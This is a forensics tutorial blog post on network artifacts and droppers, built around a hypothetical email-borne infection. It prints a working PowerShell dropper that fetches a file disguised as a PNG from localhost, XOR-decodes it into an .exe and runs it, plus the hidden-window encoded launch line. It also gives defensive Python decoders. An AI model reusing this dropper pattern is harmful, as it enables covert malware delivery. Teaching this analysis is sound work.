Hi. Today we’ll talk about network artifacts; namely, what they are and how they are presented in the case of a malware infection. Secondly, we’ll also talk about droppers since those are a nice segue from network artifacts.
Before You Read
This is mostly an introductory post, but the following posts reference tools which will be used to discuss today’s topic. You don’t have to read them, but if you want a deeper understanding, feel free to.
All About Tcpdump - This isn’t my post, but BowTiedCyber discusses Wireshark and Tcpdump there, which should give you a head start on capturing network traffic.
RTMA Part 10 - YARA and Snort - This one is paid, but its discussion of HIDS and NIDS comes before the paywall.
What
First of all, you should know that when you download anything onto your computer, whether via email, HTTP, FTP, SSH, etc., the file(s) must first pass through your firewall. Hopefully, you know what a firewall is.
In a business or corporate environment, you should (hopefully) have an Intrusion Detection/Prevention System (IDS/IPS) in place. If not, get on that. IDPSs capture inbound traffic and run various scanning sequences to “detect and prevent intrusions”. No shit, eh?
Let’s grab a quote from the YARA and Snort post:
IDSs operate as network systems that inspect traffic headed inwards towards a network. They protect systems on a network by alerting network administrators, in real-time, if malicious activity is detected. There are 2 types: network-based (NIDS), which lie at specific, strategic points within a network, and host-based (HIDS), which lie on individual devices or “hosts”.
If a computer gets infected, then clearly both the HIPS and NIPS failed to do their job. But now, you get to figure out what happened and write a YARA rule on it :D. Also, full packet capture (PCAP) logging is more common on an IPS solution.
Now, what is a PCAP? A PCAP is a capture of the full contents of every packet inbound to (or outbound from) a network (or, in this case, a host). If a malicious program came into the network and compromised a machine, then presumably the IPS would have logged the packet(s) that carried the contents of the malicious program. The program could have bypassed the IDPS’s detections by being packed or obfuscated.
In most cases, these programs are simple scripts or very small executables built in a way that avoids triggering the IDPS. Then, when the scripts are run (either unknowingly by an employee or detonated remotely via a zero-day exploit), they retrieve the actual malware program from a remote host. These small retrieval programs are known as “droppers” or “loaders”.
Oftentimes these are written in PowerShell, since PowerShell’s -enc flag executes a base64-encoded script, which is a common and sneaky way to get executable code onto a host machine. This is also common in forensics challenges on HackTheBox. Try them out sometime.
Why
The main thing you need to understand is that an intrusion will (should) be captured, but it is up to someone like you to discover what actually got through, where it came from, and where it went. There’s even a song about that.
Lastly, learning how to read packets with tools such as Wireshark and Tcpdump is something you will definitely want to pick up. Like I said, the virus comes from somewhere, and it goes through a firewall to get to you. Understanding how to find the needle in the networking haystack will be a great benefit in your career.
Packet analysis, in my opinion, isn’t very fun. It’s pretty grueling to sift through hundreds, thousands, or, in really really bad cases, millions of packets. From what I’ve learned, learning to script in a way that makes the sifting easier is invaluable.
Quick aside, this reminds me of an interview question I was given.
“If you were given thousands of files and folders and you needed to retrieve a select few files within, what would your process of retrieval look like?”
First of all, that’s a stupid question, but I answered it, and it went something like this:
“Firstly, I would immediately think of what I was looking for and then attempt to build a script around that. Doing all of that by hand would be terrible. I would first start with a simple script that would hopefully start disqualifying a series of files that are clearly not what I’m looking for. After that, I would begin to constrain my desired inputs so that I would further and further shave off the files that are unrelated to what I was looking for. As the script increases in complexity, I would be more and more confident that what was found by the script would be a part of what I was looking for.”
I think that’s a good answer even though the question was overly broad and lacked any sort of depth. I ended up getting an offer from this company, but I turned them down in favor of the company I work for now.
End of aside.
How
I’m not going to provide .pcap files, but I’ll write a quick dropper in PowerShell so you can see what they look like. That’s fun, right?
Anyways, I would advise skimming the PowerShell post if you’re really interested in it.
Let’s think of this hypothetical:
There’s been an “encryption event” at WildATVs.com. IT traced it to the computer of an employee named Joe Shmoe, and they even imaged it for you to forensically analyze. Joe told the IT team he was just checking his email for the morning. He said there was nothing out of the ordinary, just that his wife emailed him a few extra pictures of the house they were planning on buying.
Enter you. WildATVs needs you to figure out what the heck happened.
So, you get to work and start analyzing the machine, but it got hit with a self-destruction sequence, so not much survived. Instead, you need to check the PCAPs from the NIPS logs that the IT team thankfully had set up. You filter out all the inbound traffic that doesn’t go to Joe’s IP address (long story short, to keep this simpler). Joe said he checked his email in the morning, so you filter out anything that isn’t between 8:00 and 12:00. You run some packet analysis scripts, and you get a hit. A .eml file that was sent had this in its attachments:
powershell -WindowStyle hidden -enc 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
Some of you might be thinking “hm wow that’s gobbledegook”.
But, you read this article by BowTiedCrawfish, so this is something you’re familiar with.
Presumably, when he clicked what he thought was a picture of the house his wife sent, he inadvertently executed this PowerShell command. But, what does it do?
Let’s break it down.
powershell
This executes a PowerShell command. Wow.
-WindowStyle hidden
This hides the console window that would open in the case of PowerShell being invoked.
-enc
This flag takes the base64-encoded script that PowerShell is to execute.
Now you know that that gigantic string is actually a .ps1 script. You can decode it (remember that -enc takes the script as a base64-encoded, little-endian UTF-16 string) and retrieve this content:
# Download malicious program with the appearance of a PNG
$url = "http://127.0.0.1:8008/a_big_house.png"
$webClient = New-Object System.Net.WebClient
$encryptedBytes = $webClient.DownloadData($url)
# Decrypt it with a basic xor cipher
$decryptedBytes = New-Object byte[] $encryptedBytes.Length
for ($i = 0; $i -lt $encryptedBytes.Length; $i++) {
    $decryptedBytes[$i] = $encryptedBytes[$i] -bxor 0x41
}
# Save it to the temp folder
$destinationPath = "$env:APPDATA\..\Local\Temp\su2nfid7wm.exe"
[System.IO.File]::WriteAllBytes($destinationPath, $decryptedBytes)
# Execute the file
Start-Process $destinationPath
In this example, a file (a_big_house.png) is fetched from localhost:8008/. It is disguised as a “picture” because that is a way to thwart scrutiny of the network logs: “Oh, it was just a picture, no big deal.” In reality, the bytes of this “picture” are the encrypted contents of an executable.
After the bytes are downloaded, they are decoded with a basic XOR against 0x41, and the result is saved as a .exe in the temp directory. Lastly, the “malicious executable” is executed.
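Doing that -enc decoding yourself, as an added Python example that is not part of the original post: it locates the -EncodedCommand switch (including its documented -e and -ec aliases) on a command line, base64-decodes the blob, and reads it as UTF-16LE the way PowerShell does. The command line and script it decodes are constructed here, not the string from the .eml above.

```python
import base64
from typing import Optional


def find_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 blob that follows powershell's -EncodedCommand switch, or None.

    powershell.exe documents -e and -ec as aliases of -EncodedCommand and also
    accepts longer prefixes such as -enc; switch names are case-insensitive and
    may be introduced with '-' or '/'.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        if name in ("e", "ec") or (len(name) >= 3 and "encodedcommand".startswith(name)):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(blob: str) -> str:
    """Base64-decode the blob and read it as UTF-16LE, exactly as PowerShell does."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not a UTF-16LE script")
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def recover_script(cmdline: str) -> Optional[str]:
    """Pull the hidden .ps1 content out of a full command line, if it carries one."""
    blob = find_encoded_argument(cmdline)
    return None if blob is None else decode_encoded_command(blob)


# Constructed sample (not the string from the post): a one-liner of the same shape.
SAMPLE_SCRIPT = (
    '$wc = New-Object System.Net.WebClient\r\n'
    '$bytes = $wc.DownloadData("http://127.0.0.1:8008/a_big_house.png")'
)
SAMPLE_CMDLINE = "powershell -WindowStyle hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(recover_script(SAMPLE_CMDLINE))
```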
So, the .exe is saved to disk. But, remember, the self-destruction sequence destroyed any remnants that you could have analyzed from the image. Now, how do you get the executable that was downloaded?
Why, back in the PCAP of course!
You already have everything in front of you. You search for incoming traffic from 127.0.0.1 (a real IP address/domain in a real scenario) and look through the HTTP GETs for a_big_house.png. In those packets are the bytes of the downloaded executable. All you have to do is extract the packet payload, XOR each byte of the .png with 0x41, and then you have the malicious program in its entirety.
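Carving the executable out of the captured HTTP response, as an added Python example that is not part of the original post: it strips the HTTP headers, flags the image/png label that the bytes do not back up, and, going one step beyond the post’s fixed 0x41, derives the single-byte XOR key from the fact that the decoded payload must begin with MZ. The HTTP response and the PE-shaped body inside it are constructed stand-ins, and the code assumes a single-byte XOR like the dropper above.

```python
import struct
from typing import Optional, Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def split_response(response: bytes) -> Tuple[bytes, bytes]:
    """Return (headers, body); the body is what the dropper fed to -bxor."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body boundary in response")
    return head, body

def mislabelled_image(response: bytes) -> bool:
    """Server says image/png, but the bytes do not start with the PNG signature."""
    head, body = split_response(response)
    return b"content-type: image/png" in head.lower() and not body.startswith(PNG_MAGIC)

def is_pe(data: bytes) -> bool:
    """MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def recover_xor_key(body: bytes) -> Optional[int]:
    """A single-byte XOR leaks its key against known plaintext: a PE starts with 'MZ'."""
    if len(body) < 2:
        return None
    key = body[0] ^ ord("M")
    return key if body[1] ^ key == ord("Z") and is_pe(xor_bytes(body, key)) else None

def carve_executable(response: bytes) -> Optional[bytes]:
    """Decode the 'picture' back into the executable; None if the body is not one."""
    _head, body = split_response(response)
    key = recover_xor_key(body)
    return None if key is None else xor_bytes(body, key)

def build_sample_response(key: int = 0x41) -> bytes:
    """Constructed stand-in for the reply to GET /a_big_house.png: a minimal PE-shaped
    blob (not a real executable) XOR-ed with the dropper's key and labelled image/png."""
    header = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    body = xor_bytes(bytes(header) + b"PE\x00\x00" + b"\x00" * 28, key)
    return (b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Length: "
            + str(len(body)).encode() + b"\r\n\r\n" + body)
```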
Now, you can analyze the malicious executable!
But, how do you do that?
Well, that’s what the RTMA series is for.
;)
Go!
-BowTiedCrawfish